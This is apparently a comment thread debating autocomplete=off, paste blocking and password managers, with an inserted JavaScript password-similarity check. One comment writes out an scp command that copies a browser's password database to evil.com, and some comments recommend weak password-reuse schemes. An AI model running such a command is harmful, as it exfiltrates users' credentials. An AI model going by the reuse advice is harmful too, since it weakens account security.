I've run into the problem of web services not letting me store passwords. The reality is, if you let my password manager (safari jacks into OS X's keychain system) keep track of things, I'm going to use the random 12-digit alphanumeric password my password manager provides me. If you don't, I'm either going to use my shitty "brain" password or put it in my password manager anyway and just copy-paste it manually.
Thankfully, safari on both iOS and OS X has a toggle to ignore autocomplete=off, which I take advantage of liberally.
My biggest problem is with sites that don't let me copy/paste into the password field. WTF!? Who's the PHB that came up with this policy? Despite this misguided nannying, I still use randomly generated 22 character alphanumeric passwords, even if I have to open up the window in Keepass and manually type them in. Most people aren't as paranoid and anal as me, however. Whoever you are, you're basically encouraging people to use weak passwords.
Ironic, as it seems to be banks that are most often guilty of this.
Worse yet, there are banks that don't let you use any of the last 3-5 passwords. This is really annoying, especially when combined with enforcing a password change every 3 or 6 months. But there is a solution: just use whatever password you have chosen, and add a number for the current quarter or semester. Until they come up with a password strength checker measuring the similarity between your current and previous passwords (e.g. levenshtein()), you should be ok.
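The similarity check the comment above imagines, written here as an added example (it is not code from the thread or from any bank). It assumes the password-change form submits the old password in clear text alongside the new one, which is the usual case, since the stored hashes cannot be compared for similarity; `maxEdits` is a hypothetical tuning parameter.

```javascript
// Added example: server-side check that rejects a new password that is only a
// trivial edit of the one it replaces (the "append the quarter number" trick).

// Classic two-row dynamic-programming Levenshtein edit distance.
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Strip the cheap variations used to dodge history checks: letter case and a
// trailing run of digits or punctuation ("Summer2013!" -> "summer").
function normalize(pw) {
  return pw.toLowerCase().replace(/[\d\W_]+$/, "");
}

// Returns null when the change is acceptable, otherwise a reason for the UI.
// Compares both the raw strings and their normalized forms; if normalization
// empties a password (all digits), only the raw distance is used.
function checkPasswordChange(oldPw, newPw, maxEdits = 3) {
  if (newPw === oldPw) return "new password must differ from the current one";
  const raw = levenshtein(oldPw, newPw);
  const nOld = normalize(oldPw);
  const nNew = normalize(newPw);
  const norm = nOld && nNew ? levenshtein(nOld, nNew) : raw;
  const distance = Math.min(raw, norm);
  if (distance <= maxEdits) {
    return `new password is too similar to the current one (edit distance ${distance})`;
  }
  return null;
}
```

Constructed inputs such as "hunter2Q1" to "hunter2Q2" (distance 1) and "Summer2013!" to "summer2014" (normalized distance 0) are rejected, while a change to an unrelated random string passes.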
> Please note that if you combine this policy and at the same time disable copy and paste into the password fields (I look at you, Blizzard!), I hate you.
oh man. disabling paste is the worst, because it breaks KeePassX. (Apple did this last I checked!)
turbotax did that as well last year, this year they made it sane again. Luckily there's a firefox about:config setting you can do to not let websites hijack / block your clipboard events.
Another way to bypass these fields where you can't paste a password (many games are guilty of this atrocity): make an AutoHotkey[1] script for rapidly typing whatever is in your clipboard.
This line will make ctrl-alt-v type your clipboard:
The first thing I install in a new browser is an adblocker. The second thing an addon that disables autocomplete=off.
Yes I'm lazy. But my laptop is encrypted and goes back to the login screen after 2 minutes of inactivity. To me autocomplete=off is just annoying and doesn't add any security.
it really helps with forms where you are an admin and can edit other users' information... in these forms when autocomplete is on... and starts populating your information into the user you're trying to edit... well... things just get pretty messed up...
I used to be annoyed by autocomplete=off until I started using 1Password. Now, I actually tell Chrome to disable auto-filling of forms since I can fill the form fields with 1Password, which is the only place I'm keen to store personal information.
This drives some of our customers nuts because autocomplete has the annoying tendency in the most recent Safari of overwriting prepopulated fields - users end up losing configurations over this.
Otherwise I can see the benefit of ignoring the setting, perhaps, but we need consistent default behavior (chance would be a fine thing!). I don't want to be telling my customers that they should switch off autocomplete as a user shouldn't need to configure a browser to use a website!
Have you filed a bug report about Safari overwriting prepopulated fields? If not, and you don't want to deal with the painful experience that is bugreport.apple.com, feel free to drop me an email with more details about what you're seeing.
The original article fails to take into account the larger population. The basic password managers in browsers are huge security holes. The one in FF does not use a master password by default, so anyone could look at an unattended computer and see all stored passwords with a few clicks. The article mentions an old JavaScript attack on the passwords as well (but then dismisses the threat, since that one hole was patched).
So the problem really is that the browsers pushed insecure features out to the masses, and many people adopted them. The number of people in the general population who use a password manager is low (obviously it is high here on HN). So think of the autocomplete=off flag as a flag to make sure you are using a competent password manager, one that recognizes the problem and then overrides the flag. Sounds like Safari and IE 11 are already doing that, so hopefully they fixed the problems of the early password managers.
Compared to weak passwords, phishing and a myriad other threats, how likely is that someone will walk up to my computer and copy a password? How likely are they to have a true criminal intent rather than a prank on their mind?
And when your machine is compromised or otherwise controlled by an untrustworthy third party, you lost anyway.
I think the argument is that you are less likely to use the same password on every site and service, or easily guessed passwords, if you are allowed to use a password manager.
In other words, in practice there is an actual tradeoff between the two.
However, autocomplete is a great way to fight phishing. It's easy to tell people: if you think you're on website X but your password never shows up, you're probably on a different site. And the simple fact that their password is not there is enough to get most people somewhat paranoid.
So, for most people you trade a near meaningless threat to fight a major one which tends to be a net win.
> The one in FF does not use a master password by default, so anyone could look at an unattended computer and see all stored passwords with a few clicks.
Or, in its absence, take a look at the sticky notes and see all the passwords the person is using for everything. Or guess that the user's password is 'password' or something stupid like 'secret'.
I mean I agree that it's a bad call for public computers to have it enabled by default. But among people's likely options I'd far sooner have them using even a bad password manager than what I perceive them to be likely to do in its absence - and from that perspective pretty much anything that lowers the likely adoption of password managers seems like a bad call.
I don't think that the larger population are going to find that FF's password manager doesn't work with a site and go running off to download KeePass or Lastpass or something like that. I think they're just going to shrug and type in 'password', (or some other dictionary word and a couple of numbers on the end - but in any case something re-used and simple,) for that site.
You might not agree with this but hear me out. I used to work on Chrome and I was curious what the justification was for storing passwords unencrypted in Chrome. I went and talked to the Chrome security team and they frustratingly explained it to me as they get this question all the time.
As you said, in FF (and in Chrome), a few clicks and anyone could look at an unattended computer and see all the stored passwords. As they pointed out, an unlocked unattended computer can pretty much be owned by anyone who wants to own it. You've given them access to your computer. They can open a shell and start running apps. They can exploit any bug in the OS or other app. They can copy files to a USB stick or across the net. On top of that, your password manager (or FF or Chrome) will let them log into your mail, your bank, your facebook, whatever services you've saved passwords for even without knowing your password.
The point is
(1) don't leave your computer unlocked and unattended. Put a password on it; when you walk away from the computer, lock the computer (start the screensaver or whatever requires you to use a password to get back in)
(2) don't ever let someone use your computer logged in as you. If you hand someone your computer to use, log in as guest, then hand it to them.
If you're like me you'll probably reject these suggestions. I thought "I don't want to be bothered to lock and unlock my computer all the time" and I thought "It's stupid to expect me to put my computer in guest mode anytime I let someone else use it."
But, after I calmed down and thought about it I realized they are right. If someone wants your passwords or other data and you hand them an unlocked machine they are going to get them. How FF or Chrome or Password managers store passwords has nothing to do with that.
Well, why didn't the password managers in several browsers do that by default?
Also, not all attacks are about "pwning" a computer. If an attacker can gather data, such as competitive corporate data, without being detected, that is much better in many ways. In practical terms, it would also be much faster (and untraceable) to look at 2-3 key passwords in someone's open Firefox than to infect their computer with malware.
Let me fix one line in your post: If someone with sufficient technical knowledge wants your passwords or other data and you hand them an unlocked machine they are going to get them.
Now, reducing the technical knowledge required from "opening a shell and running apps" to "click here to see all passwords in seconds" greatly reduces the technical knowledge required and so greatly increases the risk you're exposed to.
You're right. But, I'm guessing the set of people who know they could see your password easily is pretty much the same set of people with sufficient technical knowledge that they either know how to do more or know how to find out how to do more.
Open terminal type
scp .somebrowser/password.db user@evil.com:
Takes no more time than writing down passwords like nfie28447ncjf;$/$38342. Probably less if there's more than one password
> So think of the autocomplete=off flag as a flag to make sure you are using a competent password manager
No, what happens is that the autocomplete=off flag is a flag to make sure you are using your brain as a password manager, which experience has shown to be a terrible idea.
Instead of a browser password manager that can help make your passwords unique per site and comprised of random characters, users are forced to use passwords from their head, likely sharing them between sites. Someone coming to your unattended computer isn't nearly the threat of you using a simple and short password across every site you visit, including the sites that end up with a stolen password database or have a moronic password recovery option.
This article uses "password managers" ambiguously. In my opinion, a browser is a terrible password manager because of what is stated in the "pros" section of the article. My advice aligns with others who have replied here - get a real password manager such as 1password and allow autocomplete="off" to do what it is supposed to do.
Sorry, but which of the two points in the ‘pro’ section (storing truly sensitive visible information and hacking of client-site databases) makes a browser less capable of acting as a password manager than a ‘real’ password manager?
Or maybe you could rephrase why you think browsers are terrible password managers? I’m quite fond of Opera’s Wand.
I'm going to go out on a limb and suggest just because 1password is really really good. So good that I don't even want to try a browser's password manager (especially since I want access to my passwords on multiple browsers and my phone/tablet as well). I'm sure browser password managers have made leaps and bounds, but so has 1password, and it's amazing.
The issue may be moot--IE 11 ignores autocomplete=off.
And in any case, for the cases where this setting is effective, it doesn't break password managers--just set your password manager to not fill the fields, but use copy and paste for the password.
> Tell me how I am supposed to fulfill these requirements if I need 20 websites daily to do my work ?
One solution to this problem (or at least one way to severely mitigate it) is to use a base word that you tweak with a simple algorithm based on the first letter, last letter, number of letters in the domain, etc. Of course some websites have mutually exclusive requirements, so this doesn't work for all sites, but I've been doing this for so many years now that while I have muscle memory for frequently used sites, I can go to a site I haven't been to in years and have no memory of the actual characters in the password, but I apply my algorithm and voila, it works!
I changed all my passwords recently to do the same thing. The problem I've recently started to see is that, let's say for example my hashed+salted password is stolen from a site. If they brute-force figure out what my password is, they'll have my "base word" and all my other accounts may still be able to be compromised.
Recently I changed my big accounts (Google, Facebook, StackOverflow) to have a slightly different "base word" and the other accounts that I can afford to lose control of have stayed the same.
It's significantly more difficult to reuse the base and figure out the additional characters than it is to get access to the user whose password is 'password'.
For insecure services that I use on mobile, public, etc computers, I do this.
Sorry, I don't have time to do so much work just to log on quickly to my email in the morning or when relogging for the 25th time in the ticket manager at work, which has too-short sessions.
Also, enjoy explaining your method to a lambda user, I'd bring popcorn and watch :)
Forced password changes are the biggest downside I've run into... I had to resort to a modified algorithm when LinkedIn was hacked, for instance. But for 90%+ of the websites I use it on, especially social networks and forums and the like, it's hardly ever an issue.
I don't think I've run into a situation where LastPass has been unable to auto-fill a form. Is this a feature of LastPass, or have I just not gone to sites that disallow autocomplete?
It's the latter. I use LastPass too, and there's one particular site where it doesn't autofill, because of autocomplete=off. It's just one site, but incredibly annoying because I use it often multiple times per day (and of course it doesn't allow me to stay logged in either.)
1password makes this never be an issue for me. ⌘+/ to log into anything with one stroke, unless I have multiple accounts for the site, in which case it's a couple of extra clicks.
I'm going to go with Bruce Schneier on this one and say that there is absolutely nothing wrong with writing your passwords down. If someone mugs me and takes my wallet there is a 99% chance they are going to get the phone too and I'll need to change all my passwords anyway.
Not letting the browser cache them is still dumb though.
Could you not run an analysis of a user's password on account creation or password reset that determines if it is likely to be autogenerated and managed by a password manager? Then, armed with this flag, enable or disable autocomplete on a user-by-user basis with JavaScript?
Someone was showing me Capital One 360 (formerly ING), which uses an onscreen PIN pad that you either have to click with your mouse, or type using a randomly generated mapping. The idea is to thwart keystroke loggers, but it's totally infuriating.
The worst part is, it doesn't even thwart keyloggers very well! It's not uncommon for password stealing malware to detect when the user is viewing a site that uses a "PIN pad" login of this type, and start taking screenshots surrounding the location of each click to capture input.
How does it break password managers? Does it prevent them from auto-filling in or auto-saving the password? I use passpack and enter/retrieve my credentials manually and so don't experience this and appreciate autocomplete=off.
Only slightly related, but I really wish GitHub would add autocomplete=off on the language selection dropdown for Gist. If you make your own autocomplete UI, I would prefer that you disable the browser UI.
I used to use Chrome as my second browser, where I'd keep my work gmail account up.
Recently it started to no longer save my password, even with an autocomplete=on plugin installed that works on other sites. That was my catalyst for uninstalling Chrome altogether and moving to Firefox for everything.
Right, this isn't what autocomplete=off is for. It's for fields where correcting the user's input to dictionary words is of negative utility, for example, typing stock tickers should not correct "aapl" to "apple".
1. Go to about:config
2. Right-click anywhere, New -> Boolean:
signon.overrideAutocomplete
Value: true
More info: https://bugzilla.mozilla.org/show_bug.cgi?id=425145
EDIT: Based on the milestone set on that issue, this setting requires Firefox 29. Another workaround is this bookmarklet: https://www.squarefree.com/bookmarklets/forms.html#remember_... referenced from comment https://bugzilla.mozilla.org/show_bug.cgi?id=425145#c16